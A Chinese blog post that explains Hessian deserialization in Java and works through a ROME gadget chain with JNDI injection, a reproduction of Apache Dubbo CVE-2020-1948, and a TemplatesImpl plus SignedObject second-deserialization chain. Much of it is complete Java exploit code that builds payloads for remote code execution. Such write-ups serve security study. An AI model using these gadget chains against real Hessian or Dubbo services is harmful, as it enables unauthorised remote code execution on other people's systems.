首页 > 其他分享 >Hessian反序列化分析

Hessian反序列化分析

时间:2024-04-11 18:35:09浏览次数:39  
标签:分析 java Object new import 序列化 public Hessian

RPC协议

RPC全称为Remote Procedure Call Protocol(远程调用协议),RPC和之前学的RMI十分类似,都是远程调用服务,它们不同之处就是RPC是通过标准的二进制格式来定义请求的信息,这样跨平台和系统就更加方便
RPC协议的一次远程通信过程如下:

  • 客户端发起请求,并按照RPC协议格式填充信息
  • 填充完毕后将二进制格式文件转化为流,通过传输协议进行传输
  • 服务端接收到流后,将其转换为二进制格式文件,并按照RPC协议格式获取请求的信息并进行处理
  • 处理完毕后将结果按照RPC协议格式写入二进制格式文件中并返回

Hessian协议

Hessian是一个基于RPC的高性能二进制远程传输协议,官方对Java、Python、C++......语言都进行了实现,Hessian一般在Web服务中使用,在Java里它的使用方法很简单,它定义远程对象,并通过二进制的格式进行传输。

Hessian的简单使用

环境依赖

 <dependency>
    <groupId>com.caucho</groupId>
    <artifactId>hessian</artifactId>
    <version>4.0.63</version>
</dependency>

Demo

package org.example;
import java.io.Serializable;

public class Person implements Serializable {
    public String name;
    public int age;

    public int getAge() {
        return age;
    }

    public String getName() {
        return name;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public void setName(String name) {
        this.name = name;
    }
}
package org.example;

import com.caucho.hessian.io.HessianInput;
import com.caucho.hessian.io.HessianOutput;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;

public class Hessian_test {
    public static <T> byte[] serialize(T o) throws IOException {
        ByteArrayOutputStream bao = new ByteArrayOutputStream();
        HessianOutput output = new HessianOutput(bao);
        output.writeObject(o);
        System.out.println(bao.toString());
        return bao.toByteArray();
    }
    public static <T> T deserialize(byte[] bytes) throws IOException {
        ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
        HessianInput input = new HessianInput(bis);
        Object o = input.readObject();
        return (T) o;
    }

    public static void main(String[] args) throws IOException {
        Person person = new Person();
        person.setName("F12");
        person.setAge(20);
        byte[] s = serialize(person);
        System.out.println((Person) deserialize(s));
    }
}

感觉就是ObjectStream的一个替换,跟原生的并没有太大差异

Hessian反序列化漏洞

package org.example;

import com.caucho.hessian.io.HessianInput;
import com.caucho.hessian.io.HessianOutput;
import com.sun.rowset.JdbcRowSetImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ToStringBean;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.Serializable;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.util.HashMap;

public class Hessian_JNDI implements Serializable {
    public static <T> byte[] serialize(T o) throws IOException {
        ByteArrayOutputStream bao = new ByteArrayOutputStream();
        HessianOutput output = new HessianOutput(bao);
        output.writeObject(o);
        System.out.println(bao.toString());
        return bao.toByteArray();
    }

    public static <T> T deserialize(byte[] bytes) throws IOException {
        ByteArrayInputStream bai = new ByteArrayInputStream(bytes);
        HessianInput input = new HessianInput(bai);
        Object o = input.readObject();
        return (T) o;
    }

    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static Object getValue(Object obj, String name) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        return field.get(obj);
    }

    public static void main(String[] args) throws Exception {
        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        String url = "ldap://localhost:1099/EXP";
        jdbcRowSet.setDataSourceName(url);


        ToStringBean toStringBean = new ToStringBean(JdbcRowSetImpl.class,jdbcRowSet);
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean);

        //手动生成HashMap,防止提前调用hashcode()
        HashMap hashMap = makeMap(equalsBean,"1");

        byte[] s = serialize(hashMap);
        System.out.println(s);
        System.out.println((HashMap)deserialize(s));
    }

    public static HashMap<Object, Object> makeMap ( Object v1, Object v2 ) throws Exception {
        HashMap<Object, Object> s = new HashMap<>();
        setValue(s, "size", 2);
        Class<?> nodeC;
        try {
            nodeC = Class.forName("java.util.HashMap$Node");
        }
        catch ( ClassNotFoundException e ) {
            nodeC = Class.forName("java.util.HashMap$Entry");
        }
        Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
        nodeCons.setAccessible(true);

        Object tbl = Array.newInstance(nodeC, 2);
        Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
        Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
        setValue(s, "table", tbl);
        return s;
    }
}

搭个ldap恶意服务,运行代码成功弹出计算器,分析一下流程,readObject处打个断点,在readObject中计算tag的值进行一个Switch,我们这里计算出来是77也就是M

跟进readMap

获取到一个空的Deserializer对象,直接跟进readMap

这里创建了一个Map对象,将我们的恶意序列化数据put进去,这里调用了2次readObject,因此我们会重复几次也会弹好几个计算器,重复过程结束后回到put方法,进入put触发的就是常规rome链,似乎非常的easy

Apache Dubbo Hessian反序列化漏洞(CVE-2020-1948)

环境搭建

直接偷大佬搭好的:https://github.com/Claradoll/Security_Learning
启动Dubbo之前得准备一些东西,需要安装Dubbo,选用Zookeeper作为注册中心(Registry),Apache Dubbo框架的流程如下

  1. 首先服务容器加载并运行Provider
  2. Provider在启动时向注册中心Registry注册自己提供的服务
  3. Consumer在Registry处订阅Provider提供的服务
  4. 注册中心返回服务地址给Consumer
  5. Consumer根据Registry提供的服务地址调用Provider提供的服务
  6. Consumer和Provider定时向监控中心Monitor发送一些统计数据

https://dlcdn.apache.org/zookeeper/zookeeper-3.8.4/
下载好后配置一下conf文件夹里的zoo.cfg文件,一开始不叫这个名字,改一下,添加这两个东西,data和log目录自己创建

dataDir=D:\Environment\Java\apache-zookeeper-3.8.4-bin\data
dataLogDir=D:\Environment\Java\apache-zookeeper-3.8.4-bin\log

先启动zookeeper,bin目录下启动zkServer.cmd,然后IDEA里分别启动provider和consumer,访问这样就搭建成功了,consumer相当于客户端,provider就是服务端

反序列化漏洞分析

同样是JNDI注入触发rome链,攻击逻辑里面已经写好了,我们访问calc路由即可弹出计算器
这里分析一下Dubbo是怎么处理的,在服务端打个断点

再给DecodeableRpcInvocation的decode方法打个断点,方便调试

打完断点访问calc路由,进入decode方法

这一段代码获取了远程接口对象的路径和类型,以及dubbo的版本等等信息,但是在最后进行了反序列化,并且这里的in输入流是Hessian2对象

之后就是Hessian反序列化的流程了,为什么别的博主到这里tag变成了72,而我还是77,又一谜题,77常规的Hessian反序列化,就不往下分析了,可以去看看72的分析过程,不过大差不差

Hessian二次反序列化利用链

TemplatesImpl+SignedObject二次反序列化

上面确实有个疑惑是为什么要用JNDI,而不是单纯的TemplatesImpl链,在这里得到了解答,这是由于Hessian反序列化和Java原生反序列化的区别,如果用TemplatesImpl打的话,运行会报错
这是因为Tempaltes的_tfactory被transient修饰符修饰了,不可进行反序列化

那为什么原生的Java反序列化不会受到这个限制呢。这是因为原生反序列化过程中,假如类的readObject重写了,那就会调用它重写的逻辑,因此看看Templates类的readObject方法:

这里手动new了一个TransformerFactoryImpl实例,这样就不会遇到那种问题了
那既然如此,我们该如何绕过这个限制呢?思路其实很清晰,就是找一个类,那个类里有原生的readObject,这样就可以通过它触发二次反序列化,得以RCE,这个类也有一些要求,那就是要接上我们之前的Rome链子,在调用任意get和set那里接上,那么就要求目标类的get或者set方法中有readObject方法,刚好上篇讲的二次反序列化,这里就能够用到

package com.example.dubboconsumer.consumer;

import com.alibaba.com.caucho.hessian.io.Hessian2Input;
import com.alibaba.com.caucho.hessian.io.Hessian2Output;
import com.rometools.rome.feed.impl.EqualsBean;
import com.rometools.rome.feed.impl.ToStringBean;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.*;
import java.util.HashMap;

public class Hessian_TemplatesImpl {

    public static void main(String[] args) throws Exception {
        TemplatesImpl templatesimpl = new TemplatesImpl();

        byte[] bytecodes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\evilref.class"));

        setValue(templatesimpl,"_name","aaa");
        setValue(templatesimpl,"_bytecodes",new byte[][] {bytecodes});
        setValue(templatesimpl, "_tfactory", new TransformerFactoryImpl());

        ToStringBean toStringBean = new ToStringBean(Templates.class,templatesimpl);
        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(123);
        setValue(badAttributeValueExpException,"val",toStringBean);

        KeyPairGenerator keyPairGenerator;
        keyPairGenerator = KeyPairGenerator.getInstance("DSA");
        keyPairGenerator.initialize(1024);
        KeyPair keyPair = keyPairGenerator.genKeyPair();
        PrivateKey privateKey = keyPair.getPrivate();
        Signature signingEngine = Signature.getInstance("DSA");

        SignedObject signedObject = new SignedObject(badAttributeValueExpException,privateKey,signingEngine);

        ToStringBean toStringBean1 = new ToStringBean(SignedObject.class, signedObject);

        EqualsBean equalsBean = new EqualsBean(ToStringBean.class,toStringBean1);

        HashMap hashMap = makeMap(equalsBean, equalsBean);

        byte[] payload = Hessian2_Serial(hashMap);
        Hessian2_Deserial(payload);
    }

    public static byte[] Hessian2_Serial(Object o) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        Hessian2Output hessian2Output = new Hessian2Output(baos);
        hessian2Output.writeObject(o);
        hessian2Output.flushBuffer();
        return baos.toByteArray();
    }

    public static Object Hessian2_Deserial(byte[] bytes) throws IOException {
        ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
        Hessian2Input hessian2Input = new Hessian2Input(bais);
        Object o = hessian2Input.readObject();
        return o;
    }

    public static HashMap<Object, Object> makeMap (Object v1, Object v2 ) throws Exception {
        HashMap<Object, Object> s = new HashMap<>();
        setValue(s, "size", 2);
        Class<?> nodeC;
        try {
            nodeC = Class.forName("java.util.HashMap$Node");
        }
        catch ( ClassNotFoundException e ) {
            nodeC = Class.forName("java.util.HashMap$Entry");
        }
        Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
        nodeCons.setAccessible(true);

        Object tbl = Array.newInstance(nodeC, 2);
        Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
        Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
        setValue(s, "table", tbl);
        return s;
    }

    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

运行即可弹计算器

标签:分析,java,Object,new,import,序列化,public,Hessian
From: https://www.cnblogs.com/F12-blog/p/18129839

相关文章

  • 20212217刘恒谦-Exp4-恶意代码分析
    一、实践过程记录1、系统运行监控(1)使用如计划任务,每隔一分钟记录自己的电脑有哪些程序在联网,连接的外部IP是哪里。运行一段时间并分析该文件,综述一下分析结果。目标就是找出所有连网的程序,连了哪里,大约干了什么(不抓包的情况下只能猜),你觉得它这么干合适不。如果想进一步分析的,......
  • 中电金信:行业智观|2023银行年报分析——金融科技发展新格局(上篇)
    ​​编辑​编辑​编辑​编辑​编辑​编辑​编辑​编辑​编辑​编辑​编辑​编辑​编辑​编辑​......
  • Redis Pipelining 底层原理分析及实践
    作者:vivo互联网服务器团队-WangFeiRedis是一种基于客户端-服务端模型以及请求/响应的TCP服务。在遇到批处理命令执行时,Redis提供了Pipelining(管道)来提升批处理性能。本文结合实践分析了SpringBoot框架下Redis的Lettuce客户端和Redisson客户端对Pipeline特性的支持原理,并针......
  • Elasticsearch 创建自定义分析器(4)
    一.自定义分析器当内置分析器不能满足时,可以创建一个自定义分析器,自定义分析器(analyzer)由:1)0或多个charactcrfilter字符过滤器2) 1个tokenizer分词器,将文本切分为分词  3)0或多个tokenfilter令牌过滤器,是属于分词后再过......
  • DDS协议测试实践及问题分析
    在上一篇文章中,我们对DDS协议测试的策略、方法和工具进行了详细的介绍。本文旨在进一步探讨如何利用这些方法和工具搭建实际的测试环境,并执行测试,进而揭示可能遇到的各类问题。  被测协议栈简介  在本次测试中,被测协议栈选择了一个在汽车行业内广泛使用的开源DDS产......
  • SIPA INAF U8145 危地马拉的贫困和不平等关系分析
    问题集3:SIPAINAFU8145危地马拉的贫困和不平等关系分析定于4月5日星期五晚上11:59,上传到Courseworks上的一个pdf文件中在本练习中,您将对危地马拉的贫困和不平等现象进行评估。数据来自《生活条件百科全书》(ENCOVI)2000年,由国家统计研究所(INE)收集危地马拉国家统计研究所,在世界银行......
  • Go性能分析-pprof
    背景go语言的性能分析工具pprof,公司很多人写过相关介绍,本文主要是做一个总结及完善~说明:要使用pprof,需要先注册(比如注册到Gin的80端口)相关文档pprof的使用pprof使用详解和源码分析实用gopprof使用指南 pprof使用pprof网页地址默认地址:http://<ip>:<port>/debug/p......
  • 基于LEAP模型的能源环境发展、碳排放建模预测及不确定性分析实践应用
     在国家“3060”碳达峰碳中和的政策背景下,如何寻求经济-能源-环境的平衡有效发展是国家、省份、城市及园区等不同级别经济体的重要课题。根据国家政策、当地能源结构、能源技术发展水平以及相关碳排放指标制定合理有效的低碳能源发展规划需要以科学准确的能源环境发展预测模型......
  • 建筑设计全过程碳排放计算与案例分析
     “30/60双碳目标”已成为我国绿色发展的新国策,建筑业对碳排放量化分析和减排也越来越重视。特别是全文强制性国标标准《建筑节能与可再生能源利用通用规范》GB55015-2021的实施,对建设项目可行性研究报告、建设方案和初步设计要求进行建筑碳排放分析;国家标准《绿色建筑评价标......
  • PowerSI-高效、精准的频域电源完整性分析工具
    PowerSI是一款用于电源和信号完整性(PI)分析的软件工具。它具有以下主要功能:提取阻抗(Z)参数和散射(S)参数:PowerSI可以提取PCB板级和封装级电源网络与信号网络的阻抗和散射参数,以便精确分析电源和信号的性能。分析谐振特性:PowerSI可以分析板上任意位置的谐振特性,找出系统在实际工......